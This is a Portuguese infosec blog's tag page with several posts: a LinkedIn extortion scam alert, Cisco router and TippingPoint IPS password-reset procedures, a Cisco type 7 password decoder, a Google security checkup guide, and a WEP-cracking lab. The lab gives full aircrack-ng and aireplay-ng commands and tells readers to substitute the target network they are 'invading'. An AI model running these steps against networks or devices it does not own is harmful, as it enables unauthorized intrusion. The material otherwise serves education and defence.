Téchne Digitus InfoSec Artigos

<índice "[ Hacking ]-[ Redes de Comunicação ]-[ DeepWeb ]-[ Anonimato ]-[ Criptomoedas ]-[ Programação ]-[ InfoSec em Geral ]-[ Off-Topic but Important ]-[ Redes Sociais ]" />

Mostrando postagens com marcador senhas. Mostrar todas as postagens
Mostrando postagens com marcador senhas. Mostrar todas as postagens
Logo Téchne Digitus InfoSec

ALERTA DE SCAM - LinkedIn

ALERTA: Scam que utiliza dados vazados do LinkedIn tenta convencer a pessoa a fazer um depósito em uma carteira de Bitcoin.

Quando este ataque de scam foi disparado

Em 09 de abril de 2020.

Como é o e-mail do Phishing Scam em Questão?



Descritivo:

Campo "Assunto" do e-mail, a conta de e-mail seguido da senha utilizada para acessar o LinkedIn na época do vazamento de dados do LinkedIn ainda em 2016.
No "Corpo" do e-mail, uma ameaça dizendo que a pessoa foi vítima de um malware que roubou essas informações e muitas outras. E por fim, pede o depósito em Bitcoins em uma carteira.


Imagem:

Linkedin Scam TechneDigitus

Note que no meu caso (veja imagem acima) o e-mail foi enviado para uma conta de Hotmail. Eu mesmo utilizava Hotmail antigamente. Hoje, os e-mails daquela conta são redirecionados para uma conta Hiper-Segura no ProtonMail.

Como o hacker obteve esses dados?

Através de um vazamento de dados no LinkedIn ocorrido em 2016.

Referência:
Aviso de violação de dados: maio de 2016. Link: < Informação sobre o Vazamento >. Acessado em 10/04/2020.

Recomendações Básicas


1ª Recomendação) Não responda o e-mail de forma alguma.

2ª Recomendação) Troque a senha do LinkedIn, ative a autenticação de dois fatores e use o Aplicativo Authy para gerenciar os tokens.

Referências:
- Authy | Two-factor Authentication (2FA) App & Guides. Link: < Authy Link >. Acessado em 10/04/2020.
Alteração de senha | LinkedIn Help. Link: < Altere sua senha no Linkedin >. Acessado em 10/04/2020.
Ativação e desativação da verificação em duas etapas | LinkedIn Help. Link: < Ative Autenticação de 2 Fatores no Linkedin >. Acessado em 10/04/2020.

Recomendação Hardcore:


1º Passo) Verifique se o seu e-mail está presente em algum vazamento de informações conhecido através do seguinte endereço: < https://haveibeenpwned.com/ >.

2º Passo) Se ele foi vazado em qualquer uma dessas ocasiões, recomendo que deixem de usar essa conta de e-mail. Isso porque essa conta de e-mail será um alvo eterno de ataques como esse, spams entre outros…
Se possível, crie um e-mail em um serviço de e-mails efetivamente seguro e reconhecido pela comunidade de especialistas de segurança da informação como o ProtonMail.

Referências:
Have I Been Pwned. Link: < Verificação >. Acessado em 10/04/2020.
Secure email: ProtonMail is free encrypted email. Link: < ProtonMail Link >. Acessado em 10/04/2020.


Logo Téchne Digitus InfoSec

DICA: Como Recuperar Senha de um Roteador Cisco 2800 Series

Olá Leitores e Visitantes ocasionais do Téchne Digitus! :)


Router Cisco 2800 Series Téchne Digitus InfoSec

Esta página apresenta um passo a passo de como obter ou recuperar acesso a um roteador Cisco 2800 Series (se ele não for igual, deve ser bem parecido com o da imagem acima).

Vamos ao que interessa:

Pré-Requisitos:

- Acesso Físico ao Router
- Cabo console conectado a sua máquina e o programa de terminal (Putty, por exemplo) configurado com os seguintes parâmetros:

  • 9600 baud rate 
  • No parity 
  • 8 data bits 
  • 1 stop bit 
  • No flow control 

Procedimento: 

1) Desligue o Router

2) Remova a Compact Flash

3) Ligue o Router

4) Digite: confreg 0X2142 

5) Insira a Compact Flash

6) Digite: reset

7) Quando for aparecer algo do tipo "enter the initial configuration", digite: no

8) Digite: enable

9) Digite: configure memory 

10) A partir deste momento, você poderá visualizar as configurações e quebrar qualquer password type 7 que estiver disponível, pode fuçar em todas as configurações e depois sair sem alterar nada... Ou simplesmente alterar a senha desejada e salvar ela nas configurações!

Quando estiver satisfeito, vá para o passo 11.

11) No modo de configuração global (conf t), digite: config-register 0X2102 

12) Digite: do wr 

13) Digite: do reload 


E pronto! O router agora é seu!


pass technedigitus


Para saber mais:


Vídeo Relacionado:

Laboratório Packet Tracer ACLs Parâmetro Established

Logo Téchne Digitus InfoSec

Laboratório: Quebrando uma Chave WEP - Invadindo uma Rede Sem Fio

Quebrando uma Chave WEP

Laboratório TéchneDigitus
Pen Test 01: Quebrando uma Chave WEP
Tipo: Invadindo Redes Wifi

Pré-Requisitos:

Em uma máquina virtual, executar a distribuição LIVE do Kali Linux.
Material Utilizado para Este Lab:

Hardware:
- Notebook (ex.: Processador I5, RAM: 16GB)
- Roteador Wifi (ex.: RE024 da Multilaser)
- Interface de Rede USB (ex.: DWA-125 da D-Link)

Software:
- Sistema Operacional do Notebook: Windows 8.1
- Software de Virtualização: VMware Workstation 11
- Sistema Operacional Virtualizado: Kali Linux 1.1.0 versão Live

Foto do material utilizado neste lab

Procedimento Preparatório:

(considerando que o VMware já está instalado, a ISO do Kali já está disponível no HD do Notebook e no roteador já existe uma rede wifi com chave WEP configurada)
a) Abrir o VMware e criar uma máquina virtual para subir a versão Live do Kali, com 1 Processador, 2 Núcleos, 5 GB de RAM.
b) Plugar a interface de rede wifi usb
c) Inicializar o Kali

Vamos ao Lab...

Laboratório: Quebrando uma Chave WEP

1) Abra o terminal e dê um ifconfig. Verifique a sua interface USB foi encontrada pelo Kali.

Passo 1 - Imagem
2) Digite: airmon-ng start wlan0//Se a sua interface de rede estiver com outro nome, digite-o no lugar de wlan0.

Passo 2 - Imagem

3) No meu exemplo, o output informou que existem 3 processos 3672, 4168 e 4493 que podem atrapalhar o lab. Sendo assim, utilizando os comandos kill 3672, kill 4168 e kill 4493, derrubamos os processos desejados. (Note também que o processo 4493 devia estar amarrado a um dos outros dois processos. Quando matei-os, matei o terceiro junto.)

Passo 3 - Imagem
4) Digite agora airodump-ng -i mon0 e anote o número do canal e, o MACdo AP.

Passo 4 - Imagem
5) Digite agora: airodump-ng --ivs -w dados --channel 13 --bssid C8:3A:35:09:D7:28 mon0

Neste momento, o Kali está coletando e salvando em um arquivo dados-01.ivs, os dados necessários para rodar o algoritmo de quebra da WEP.

Para que ele faça a coleta de dados é necessário que pacotes dessa rede wifi alvo estejam transitando pela rede. Isto é, a rede precisa estar em utilização.

Passo 5 - Imagem

Passo 6) Gerar tráfego para coletar dados...

Formas de Gerar Tráfego:

- Em meu caso, conectei a placa a interface WAN do meu AP num cabo com Internet e conectei outro PC na rede Wifi do Lab para navegar na internet e gerar dados para a coleta. Mas essa forma só é possível devido a nós sermos detentores dos equipamentos nos quais estamos testando.

(A) - Abra um novo terminal e digite aireplay-ng -1 0 -e TechneDigitus_Lab -a C8:3A:35:09:D7:28 -h 00:26:5A:6F:9E:CC mon0

Atenção, substituir:

TechneDigitus_Lab - Pelo SSID (nome da rede wifih) da rede que você está tentando invadir
C8:3A:35:09:D7:28 - Pelo endereço MAC do AP que você está tentando invadir
00:26:5A:6F:9E:CC - Pelo endereço MAC da sua placa de rede usb

Passo 6 - A - Imagem
(B) - Agora digite aireplay-ng -3 -b C8:3A:35:09:D7:28 -h 00:26:5A:6F:9E:CC mon0 e deixe rodando até que você, na outra tela de terminal, consiga obter a chave WEB conforme o próximo passo.

Atenção, substituir:

C8:3A:35:09:D7:28 - Pelo MAC do AP que está tentando invadir
00:26:5A:6F:9E:CC - Pelo MAC da sua placa de rede usb

Passo 6 - B - Imagem
7) Até este momento, devemos ter chego até este passo com 2 janelas de terminais abertas e coma um comando rodando. Uma para o comando do passo 5 e outra para o comando do passo 6B.
Agora, para o passo 7, abriremos uma nova janela de terminal e digitaremos primeiro ls para confirmar o nome do arquivo onde estão sendo gravados os dados capturados pelo passo 5. E, por fim:
aircrack-ng -a 1 dados-01.ivs

Passo 7 - Imagem
E pronto! Conforme podemos ver na imagem, a chave WEP foi descriptografada corretamente e a senha era: [email protected]

---

Para saber mais:

Invadindo Sites com SQLMAP
- 5 Serviços de E-mail Anônimo e/ou Seguro Gratuitos
- Dica: Sessões Ativas no Facebook - Como gerenciá-las
- Remover Telemetria e Mensagem de Instalação do Windows 10 nos Windows 7/8
Logo Téchne Digitus InfoSec

Como resetar a senha de uma conta "SuperUser" em um TippingPoint NX IPS

Reset de Senha HP TippingPoint

Procedimento passo-a-passo de como resetar a senha de um IPS HP TippingPoint.

Intodução ao HP Tipping Point IPS

O TippingPoint é um equipamento IPS da HP.

TippingPoint no RackIPS é Intrusion Prevention System, ou seja um sistema de prevenção a intrusões. Ele basicamente é colocado como uma bridge na rede (pega as informações de um lado e joga para o outro) enquanto analisa o tráfego em nível de camada 7 (que é a camada de aplicação de acordo com o modelo OSI).

Funciona mais ou menos como um anti-vírus de rede. Pois ele analisa o tráfego que está passando e consegue identificar tráfegos de ataques, como por exemplo um SQL-Injection ou comandos de controle de um client de uma botnet.


IPS Topology

Procedimento: Reset de Senha ou Criação de Usuário em casos de Emergência no HP TippingPoint


Primeiramente, devemos deixar claro que não é possível recuperar uma senha, ou seja, descobrir qual a senha que está configurada. Mas existe um procedimento que permite a criação de um novo usuário, alteração da senha de um usuário existente e até mesmo, alterar a o nível do privilégio daquela conta.

No HP TippingPoint temos três  níveis de privilégio que podem ser parametrizados em uma conta:

  • Nível 0: Um password não precisa nem ser definido. Qualquer senha e/ou formato são aceitos.
  • Nível 1: Pelo menos oito caracteres.
  • Nível 2: (padrão): Pelo menos oito caracteres, pelo menos duas letras, pelo menos dois números e pelo menos um carácter alfa-numérico.
  1. Conecte no dispositivo NX IPS via porta serial de console usando um cabo console pullover. No software de acesso ao terminal (Putty, o mais utilizado) configure os seguintes parâmetros: 115200bps, 8 Data Bits, No Parity, 1 Stop Bit.
    Configurações no Putty para acesso ao Console do TippingPoint
    Configurações no Putty para acesso ao Console do TippingPoint
  2. Reinicie o equipamento.
  3. Aguarde as primeiras linhas de carregamento... Espere até o momento de aparecer "Loading".

    Iniciando o TippingPoint
  4. Digite: "mkey" sem as aspas e aperte a tecla <Enter>.

    "mkey" para acessar o modo de reset e escolhendo o nível de privilégio
    Observação: após o "Loading" aparecer, você terá 3 segundos para digitar antes de aparecer uns pontinhos. Se aparecerem antes do procedimento, será necessário reiniciar novamente o dispositivo.
  5. Escolha o nível de privilégio e clique <Enter>.
  6. Escreva o nome da conta que quer resetar a senha (ou criar).

    Escolhendo o nome de login no HP TippingPoint
  7. Confirme o nome do usuário (Y/N) e clique <Enter>.

    Confirmando o nome de usuário no HP TippingPoint
  8. Entre com a nova senha e clique <Enter>.
  9. Confirme a nova senha e clique <Enter>.

    Entrando com uma nova Senha no HP TippingPoint
  10. Logue no equipamento com a senha que acabou de criar.
Senha do HP TippingPoint Resetada



Para saber mais:

Logo Téchne Digitus InfoSec

Quebrando a Cifra Vigenère - Cisco Password Type 7 Cracker

"Crackeando" a Senha de um Cisco

"Keep Calm And Trust a Cryptanalyst" Téchne Digitus InfoSec
Quando estudamos redes pelo material didático da Cisco, em melhores práticas, aprendendo o comando "service password-encryption" que "encripta" em baixo nível de criptografia (na realidade ele mascara com uma cifra) todas as senhas que seriam salvas em texto plano no arquivo de configuração do equipamento. Essas senhas ficando sendo identificadas como "senhas tipo 7", veja exemplo abaixo:

!
enable password 7 0822455D0A16 
!
line con 0 password 7 0822455D0A16544541
!
line vty 0 4 password 7 08224F4008
login
!

A cifra que é usada nos equipamentos Cisco, conforme exemplo acima, é a Cifra "Vigenère".

Vigenère technedigitus

A Cifra Vigenère é um método de criptografia "cifrática" alfabética que usa uma série de cifras César diferentes baseadas em letras de uma palavra chave. É uma simples forma de substituição poli alfabética.

A Cifra Vigenère (Pronúncia francesa: ​[viʒnɛːʁ]) foi reinventada várias vezes. O método foi originalmente descrito por Giovan Bellaso; no entanto, a estrutura foi depois re-atribuída para Blaise Gegenère no século 19, e é agora amplamente conhecido como "Cifra Vigenère".



Embora a cifra seja fácil de entender e implementar, por três séculos resistiu a todas as tentativas de quebrá-la; e ganhou o título de "le chiffre indéchiffrable" (francês para 'a cifra indecifrável'). Muitas pessoas tentaram criar estruturas que eram essencialmente a mesma. Friedrich Kasiski foi o primeiro a publicar uma metologia geral para decifrar essa cifra.

Existe um código JavaScript pronto que pode efetuar a decodificação desta cifra, e o disponibilizamos no Pastebin: https://pastebin.com/uLiuKD0U

Você também pode usar o formulário abaixo para cracker a senha do tipo Password Type 7.

Experimente crackear a cifra 0822455D0A16 com o formulário abaixo

1. Copie e cole: 0822455D0A16  no campo "Type 7 Password" do formulário abaixo;
2. Clique no botão "Crack Password;
3. Veja a senha descriptografada aparecer no campo seguinte!


Type 7 Password:



Convertido para texto plano:

---

Para saber mais:

DICA: Como Recuperar Senha de um Roteador Cisco 2800 Series
Simulados para CCNA Security - Cisco IINS 640-553
Invadindo Sites com SQLMAP
Logo Téchne Digitus InfoSec

Checagem de Segurança do Google - Como proteger a sua conta?

Google Sec Téchne Digitus
Assegurando a sua conta

Google Security - Assegurando sua conta

Ao analisar questões de segurança em plataformas do Google, encontramos a "Lista de verificação de segurança do Gmail". Essa é uma documentação do Google muito simples e bem interessante! Temos aqui uma espécie de Wizard no qual em seis itens diferentes, verificamos todas as configurações disponíveis para proteger uma conta no Google.

Disponível no idioma português-brasileiro em linguagem simples e direta!

Segue o link: https://myaccount.google.com/security-checkup?pli=1

Basta acessar o endereço do link acima e verá: "Verificação de segurança" e logo em sequência um status se foi ou não encontrado algum problema em sua conta.

Verificação de Segurança Google

Veja abaixo uma explicação dos itens de segurança disponíveis:

(1) Seus dispositivos: Verifique em quais dispositivos a sua conta do Google está logada e, se necessário, utilize a opção "Sair" para desconectar sua conta de tal dispositivo.

Seus dispositivos - Téchne Digitus


(2) Ocorrências de segurança recentes: Fique ciente de quais os eventos ocorridos nos últimos tempos.

incidentes technedigitus


(3) Verificação em duas etapas: verifique as opções configuradas para verificação em uma segunda etapa (além da senha).

Verificação em duas etapas - Téchne Digitus

(4) Acesso de terceiros: verifique quais sites, sistemas ou aplicativos estão autorizados a logar utilizando a sua conta do Google. Estes, ocasionalmente, poderão ter acesso a informações pessoais suas em sua conta do Google. É importante revogar o acesso caso não seja confiável ou não seja mais utilizado!

Acesso de Terceiros - Téchne Digitus

(5) Configurações do Gmail: Verifique quais customizações são utilizadas em seu Gmail, caso existam.

Gmail Technedigitus


(6) Check-up de senhas: verifique quais as senhas salvas pelo Google e confira sugestões do Google para protegê-las.

Verifica Senhas Technedigitus


Dicas adicionais:


- Vídeo do Google sobre como manter seu computador limpo:


- Mantenha seu browser atualizado!
Verifique a versão do seu browser, se precisa ou não atualizá-lo e como fazer isso no link: https://www.whatsmybrowser.org/

Qual o seu navegador? Technedigitus


- Instale extensões/plugins de segurança em seu navegador. Veja no seguinte artigo, quais os três melhores programas de segurança para seu browser: https://www.technedigitus.com/2015/08/os-tres-melhores-plugins-para-seguranca.html


- Vídeo do Google sobre como identificar se um e-mail é real ou falso:


- Vídeo do Google alertando sobre a importância de deslogar-se de sua conta após o uso:



Para saber mais: